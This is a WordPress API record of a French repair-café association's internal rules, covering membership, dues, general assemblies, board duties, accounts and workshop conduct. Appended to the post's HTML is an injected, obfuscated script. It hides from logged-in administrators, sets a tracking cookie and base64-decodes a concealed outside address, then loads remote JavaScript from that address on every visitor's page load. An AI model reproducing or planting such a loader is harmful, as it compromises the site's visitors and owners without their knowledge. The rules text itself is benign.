{"id":1994,"date":"2025-12-17T11:45:47","date_gmt":"2025-12-17T10:45:47","guid":{"rendered":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1994"},"modified":"2026-02-17T15:34:47","modified_gmt":"2026-02-17T14:34:47","slug":"reglement-interieur","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1994","title":{"rendered":"REGLEMENT INTERIEUR"},"content":{"rendered":"<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Association R\u00e9par en Jalles<\/strong><\/span><br \/>\n<span style=\"font-size: 18pt;\"><strong>REGLEMENT INTERIEUR<\/strong><\/span><\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Pr\u00e9ambule<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Le pr\u00e9sent r\u00e8glement int\u00e9rieur est \u00e9tabli par le Conseil d&rsquo;Administration de l&rsquo;association R\u00e9par&rsquo;en Jalles en application de l\u2019article 8 des statuts de l\u2019association.<br \/>\nIl est destin\u00e9 \u00e0 fixer les divers points non pr\u00e9cis\u00e9s par les statuts et notamment ceux qui ont trait \u00e0 l\u2019administration interne de l\u2019association d\u00e9nomm\u00e9e R\u00e9par&rsquo;en Jalles, sise \u00e0 St M\u00e9dard en Jalles, et dont l&rsquo;objet est de :<br \/>\n&#8211; Diminuer les quantit\u00e9s de d\u00e9chets,<br \/>\n&#8211; Donner une deuxi\u00e8me vie aux objets non-utilis\u00e9s ou r\u00e9parables pour \u00e9viter de les jeter,<br \/>\n&#8211; Transmettre les savoirs faire de la r\u00e9paration et de la transformation.<br \/>\nPour r\u00e9pondre \u00e0 ces objectifs, l\u2019association organise des ateliers de r\u00e9paration anim\u00e9s par des r\u00e9parateurs b\u00e9n\u00e9voles.<br \/>\nLe pr\u00e9sent r\u00e8glement int\u00e9rieur s\u2019applique \u00e0 tous les membres de l\u2019association. Il pourra \u00eatre modifi\u00e9 par d\u00e9cision du Conseil d&rsquo;Administration. Il est mis \u00e0 disposition de l\u2019ensemble des membres ainsi qu\u2019\u00e0 chaque nouvel adh\u00e9rent, et est annex\u00e9 aux statuts de l\u2019association. Le pr\u00e9sent r\u00e8glement int\u00e9rieur est par ailleurs affich\u00e9 dans les locaux de l\u2019association.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 1 : Adh\u00e9sions<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Pour \u00eatre membre de l&rsquo;association R\u00e9par&rsquo;en Jalles, le demandeur devra remplir une demande d&rsquo;adh\u00e9sion, dat\u00e9e et sign\u00e9e, pr\u00e9cisant l\u2019engagement de respecter les statuts et le r\u00e8glement int\u00e9rieur.<br \/>\nIl s\u2019acquittera du montant de la cotisation annuelle fix\u00e9 par le Conseil d&rsquo;administration.<br \/>\nLa cotisation peut \u00eatre familiale : une seule adh\u00e9sion pour les membres de la famille vivant \u00e0 la m\u00eame adresse. Une adh\u00e9sion familiale ne donne droit qu&rsquo;\u00e0 un vote lors de toute assembl\u00e9e g\u00e9n\u00e9rale.<br \/>\nLe conseil d&rsquo;administration peut refuser ou r\u00e9silier une adh\u00e9sion pour un motif qui devra \u00eatre explicit\u00e9 lors d&rsquo;un entretien.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 2 : Cotisations<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Le montant de cotisation est \u00e9tabli pour une ann\u00e9e. La p\u00e9riode de r\u00e9f\u00e9rence est l&rsquo;ann\u00e9e scolaire.<br \/>\nLa cotisation peut \u00eatre r\u00e9gl\u00e9e en esp\u00e8ces ou en ch\u00e8ques \u00e0 l&rsquo;ordre de l&rsquo;association.<br \/>\nLe montant de la cotisation est \u00e9tabli \u00e0 ce jour \u00e0 7\u20ac.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 3 : Assembl\u00e9e g\u00e9n\u00e9rale (AG)<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">La convocation peut \u00eatre envoy\u00e9e par n&rsquo;importe quel moyen de communication (courriel, courrier, directement dans la bo\u00eete aux lettres, ou avis dans la presse) au moins 15 jours avant la date de l\u2019AG. Elle comprendra l\u2019ordre du jour de l\u2019AG \u00e9tabli par le Conseil d&rsquo;Administration..<br \/>\nL\u2019AG d\u00e9lib\u00e8re et se prononce sur les questions figurant \u00e0 son ordre du jour. Le vote par procuration est autoris\u00e9 si la procuration est pr\u00e9sent\u00e9e \u00e0 l\u2019ouverture de l\u2019AG. Le nombre de pouvoirs d\u00e9tenus par un membre est au maximum de 2.<br \/>\nLes adh\u00e9rents peuvent demander l&rsquo;ajout de points \u00e0 l\u2019ordre du jour par envoi de leur demande au moins 5 jours avant l&rsquo;AG.<br \/>\nLe mode de scrutin sera un vote \u00e0 main lev\u00e9e pour la plupart des points, \u00e0 bulletin secret si des adh\u00e9rents le demandent express\u00e9ment.<br \/>\nLe quorum est \u00e9tabli \u00e0 1\/4 des adh\u00e9rents. S\u2019il n&rsquo;est pas atteint, une deuxi\u00e8me AG sera convoqu\u00e9e pour laquelle aucun quorum ne sera n\u00e9cessaire. Les d\u00e9cisions sont prises \u00e0 la majorit\u00e9 relative des votants.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 4 : Conseil d\u2019administration (CA)<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">La direction de l&rsquo;association est coll\u00e9giale ; le CA se r\u00e9unit au moins une fois par semestre. A chaque r\u00e9union, un membre du CA est d\u00e9sign\u00e9 pour \u00e9tablir le CR.<br \/>\nLe CA comprend au minimum 4 membres.<br \/>\nLes d\u00e9cisions du CA sont prises \u00e0 la majorit\u00e9 simple.<br \/>\nUn membre du CA peut d\u00e9cider de le quitter librement et \u00e0 tout moment. Une autre personne pourra \u00eatre nomm\u00e9e lors de la prochaine assembl\u00e9e g\u00e9n\u00e9rale.<br \/>\nLe CA cr\u00e9e les commissions habilit\u00e9es \u00e0 g\u00e9rer les activit\u00e9s dont elles ont la charge et \u00e0 \u00e9tudier tout projet int\u00e9ressant leur objet.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 5 : Comptabilit\u00e9<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">La bonne tenue des comptes est garantie par un membre du CA d\u00e9sign\u00e9 \u00e0 cet effet d\u00e9nomm\u00e9 \u00ab\u00a0tr\u00e9sorier\u00a0\u00bb.<br \/>\nLe tr\u00e9sorier qui ne proc\u00e8de \u00e0 des paiements que sur pr\u00e9sentation d\u2019une pi\u00e8ce comptable vis\u00e9e d&rsquo;un autre membre du CA.<br \/>\nLa sinc\u00e9rit\u00e9 et la conformit\u00e9 des comptes sont garanties par deux membres du bureau d\u00e9sign\u00e9s par l\u2019AG.<br \/>\nLe tr\u00e9sorier pr\u00e9sente aux adh\u00e9rents r\u00e9unis en AG un rapport comptable annuel complet.<br \/>\nLe d\u00e9tail des informations financi\u00e8res est mis \u00e0 disposition des membres du CA \u00e0 leur demande et aux adh\u00e9rents lors des AG annuelles ou \u00e0 leur demande.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 6 : Modification du r\u00e8glement int\u00e9rieur<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Une demande de modification du r\u00e8glement int\u00e9rieur peut \u00eatre faite par tout membre du CA et doit \u00eatre valid\u00e9e par une r\u00e9union du CA.<br \/>\nLa nouvelle version du RI sera soumise au vote lors de l&rsquo;AG suivante.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 7 : Fonctionnement<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">L&rsquo;association a pour objectif de r\u00e9parer et\/ou valoriser des objets divers pour limiter les quantit\u00e9s de d\u00e9chets et transmettre les savoir-faire.<br \/>\nToute personne apportant un objet \u00e0 r\u00e9parer ainsi que toute personne souhaitant participer aux ateliers de r\u00e9paration doit \u00eatre adh\u00e9rente de l&rsquo;association (pour prise en charge de l&rsquo;assurance).<br \/>\nSauf cas particulier, un seul objet par adh\u00e9rent et par jour pourra \u00eatre pris en charge.<br \/>\nL&rsquo;association sera vigilante \u00e0 ce que la r\u00e9paration ne rel\u00e8ve pas de la prise en charge d&rsquo;un professionnel local \u00e0 un tarif acceptable pour la valeur de l&rsquo;objet.<br \/>\nEn r\u00e8gle g\u00e9n\u00e9rale, le propri\u00e9taire d&rsquo;un objet \u00e0 r\u00e9parer sera invit\u00e9 \u00e0 participer \u00e0 sa r\u00e9paration.<br \/>\nChaque adh\u00e9rent est responsable de sa propre s\u00e9curit\u00e9 et s&rsquo;engage \u00e0 respecter les consignes de s\u00e9curit\u00e9 \u00e9l\u00e9mentaires<br \/>\nSi des pi\u00e8ces d\u00e9tach\u00e9es sont n\u00e9cessaires pour la r\u00e9paration, le propri\u00e9taire de l&rsquo;objet sera invit\u00e9 \u00e0 les acqu\u00e9rir par lui-m\u00eame avec les conseils des adh\u00e9rents r\u00e9parateurs b\u00e9n\u00e9voles.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 8 : Limites<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Les r\u00e9parateurs sont des adh\u00e9rents b\u00e9n\u00e9voles.<br \/>\nL&rsquo;association se r\u00e9serve le droit de refuser une r\u00e9paration. Elle ne s&rsquo;engage pas sur un d\u00e9lai d&rsquo;intervention sur les objets qui sont amen\u00e9s, et ne traitent pas les remises aux normes.<br \/>\nL&rsquo;association d\u00e9cline toute responsabilit\u00e9 dans l&rsquo;usage des objets r\u00e9par\u00e9s.<br \/>\nLes activit\u00e9s de l&rsquo;association n&rsquo;ont pas d&rsquo;obligation de r\u00e9sultats et elles ne donnent pas lieu \u00e0 des garanties.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 9 : Dons d\u2019objets<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Dans le but de r\u00e9duire les d\u00e9chets, des personnes peuvent d\u00e9cider de donner \u00e0 l&rsquo;association des objets en \u00e9tat ou \u00e0 r\u00e9parer.<br \/>\nL&rsquo;association se r\u00e9serve le droit de les accepter ou les refuser selon leur \u00e9tat, les stocks possibles et l&rsquo;encombrement n\u00e9cessaire.<br \/>\nEn cas de refus il sera conseill\u00e9 au propri\u00e9taire de l&rsquo;objet de se diriger vers une autre association (Secours Populaire, Emma\u00fcs etc &#8230;).<br \/>\nEn cas de don, l&rsquo;adh\u00e9sion \u00e0 l&rsquo;association n&rsquo;est pas obligatoire.<\/p>\n<p><span style=\"font-size: 14pt;\"><strong>Article 10 : Fr\u00e9quence des activit\u00e9s<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\">Dans son local, l&rsquo;association affichera le calendrier des journ\u00e9es d&rsquo;ouverture d&rsquo;un mois sur l&rsquo;autre.<br \/>\nUne r\u00e9gularit\u00e9 sera recherch\u00e9e avec les disponibilit\u00e9s des r\u00e9parateurs pour faciliter l&rsquo;accueil du public.<br \/>\nHors d&rsquo;un local d\u00e9di\u00e9 \u00e0 l&rsquo;association, R\u00e9par&rsquo;en Jalles fonctionne lors de journ\u00e9es particuli\u00e8res \u00e9tablies en accord avec la municipalit\u00e9 ou la structure accueillante : vide-grenier, forum associatif, animations diverses.<\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>St M\u00e9dard-en-Jalles le 1er septembre 2016\u00a0 <\/strong><\/span><\/p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>(r\u00e9vis\u00e9 en Juin 2024)<\/strong><\/span><\/p>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Association R\u00e9par en Jalles REGLEMENT INTERIEUR Pr\u00e9ambule Le pr\u00e9sent r\u00e8glement int\u00e9rieur est \u00e9tabli par le Conseil d&rsquo;Administration de l&rsquo;association R\u00e9par&rsquo;en Jalles en application de l\u2019article 8 des statuts de l\u2019association. Il est destin\u00e9 \u00e0 fixer les divers points non pr\u00e9cis\u00e9s par les statuts et notamment ceux qui ont trait \u00e0 l\u2019administration interne de l\u2019association d\u00e9nomm\u00e9e &hellip; <a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/?p=1994\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">REGLEMENT INTERIEUR<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1994","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1994","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1994"}],"version-history":[{"count":2,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1994\/revisions"}],"predecessor-version":[{"id":2038,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/1994\/revisions\/2038"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1994"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1994"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1994"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}